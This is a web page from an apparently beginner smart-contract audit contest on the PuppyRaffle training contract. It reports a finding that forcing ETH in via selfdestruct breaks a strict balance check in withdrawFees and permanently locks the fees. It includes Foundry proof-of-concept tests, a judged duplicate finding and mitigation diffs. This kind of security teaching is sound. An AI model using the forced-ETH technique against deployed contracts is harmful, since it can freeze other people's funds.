Puppy Raffle

AI First Flight #1
Beginner FriendlyFoundrySolidityNFT
EXP
View results
Submission Details
Severity: medium
Valid

withdrawFees can be permanently blocked by forcing ETH into the contract

Root + Impact

Description

withdrawFees sends the accumulated protocol fees to the feeAddress, guarding with a strict equality check that the contract balance equals totalFees. The problem is that the strict equality `address(this).balance == uint256(totalFees)` can be permanently broken. Anyone can force ETH into the contract via selfdestruct (which bypasses receive/fallback), making the balance exceed totalFees. The equality then never holds again, and fees become permanently unwithdrawable.

function withdrawFees() external {
require(address(this).balance == uint256(totalFees), "PuppyRaffle: There are currently players active!"); // @> strict equality is brittle
uint256 feesToWithdraw = totalFees;
totalFees = 0;
(bool success,) = feeAddress.call{value: feesToWithdraw}("");
require(success, "PuppyRaffle: Failed to withdraw fees");
}

Risk

Likelihood:

  • Occurs when anyone sends ETH to the contract via selfdestruct, or when there are still active players with funds in the contract.

Impact:

  • The strict equality never holds again, so withdrawFees always reverts and the protocol fees are permanently locked in the contract.

Proof of Concept

An attacker deploys a contract holding 1 wei and calls selfdestruct(payable(puppyRaffle)). The contract balance is now totalFees + 1 wei, so the require in withdrawFees never passes again.

function test_PoC_WithdrawFeesBlocked() public {
// 4 jugadores entran y se selecciona ganador -> se acumulan fees
address[] memory players = new address[](4);
for (uint256 i = 0; i < 4; i++) players[i] = address(uint160(i + 1));
puppyRaffle.enterRaffle{value: entranceFee * 4}(players);
vm.warp(block.timestamp + 1 days + 1);
vm.roll(block.number + 1);
puppyRaffle.selectWinner();
// Un atacante fuerza 1 wei extra al contrato via selfdestruct
new ForceFeeSender{value: 1 wei}(address(puppyRaffle));
// Ahora balance != totalFees, asi que withdrawFees revierte para siempre
vm.expectRevert("PuppyRaffle: There are currently players active!");
puppyRaffle.withdrawFees();
// Las fees quedan atrapadas permanentemente.
}

Recommended Mitigation

Do not gate withdrawal on a strict balance equality, which is manipulable via forced ETH. Withdraw the tracked totalFees amount directly.

- require(address(this).balance == uint256(totalFees), "PuppyRaffle: There are currently players active!");
+ // Track fees explicitly and withdraw the tracked amount, not gated on exact balance equality
+ uint256 feesToWithdraw = totalFees;
+ totalFees = 0;
- uint256 feesToWithdraw = totalFees;
- totalFees = 0;
(bool success,) = feeAddress.call{value: feesToWithdraw}("");
require(success, "PuppyRaffle: Failed to withdraw fees");
Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 3 hours ago
Submission Judgement Published
Validated
Assigned finding tags:

[M-02] Slightly increasing puppyraffle's contract balance will render `withdrawFees` function useless

## Description An attacker can slightly change the eth balance of the contract to break the `withdrawFees` function. ## Vulnerability Details The withdraw function contains the following check: ``` require(address(this).balance == uint256(totalFees), "PuppyRaffle: There are currently players active!"); ``` Using `address(this).balance` in this way invites attackers to modify said balance in order to make this check fail. This can be easily done as follows: Add this contract above `PuppyRaffleTest`: ``` contract Kill { constructor (address target) payable { address payable _target = payable(target); selfdestruct(_target); } } ``` Modify `setUp` as follows: ``` function setUp() public { puppyRaffle = new PuppyRaffle( entranceFee, feeAddress, duration ); address mAlice = makeAddr("mAlice"); vm.deal(mAlice, 1 ether); vm.startPrank(mAlice); Kill kill = new Kill{value: 0.01 ether}(address(puppyRaffle)); vm.stopPrank(); } ``` Now run `testWithdrawFees()` - ` forge test --mt testWithdrawFees` to get: ``` Running 1 test for test/PuppyRaffleTest.t.sol:PuppyRaffleTest [FAIL. Reason: PuppyRaffle: There are currently players active!] testWithdrawFees() (gas: 361718) Test result: FAILED. 0 passed; 1 failed; 0 skipped; finished in 3.40ms ``` Any small amount sent over by a self destructing contract will make `withdrawFees` function unusable, leaving no other way of taking the fees out of the contract. ## Impact All fees that weren't withdrawn and all future fees are stuck in the contract. ## Recommendations Avoid using `address(this).balance` in this way as it can easily be changed by an attacker. Properly track the `totalFees` and withdraw it. ```diff function withdrawFees() external { -- require(address(this).balance == uint256(totalFees), "PuppyRaffle: There are currently players active!"); uint256 feesToWithdraw = totalFees; totalFees = 0; (bool success,) = feeAddress.call{value: feesToWithdraw}(""); require(success, "PuppyRaffle: Failed to withdraw fees"); } ```

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!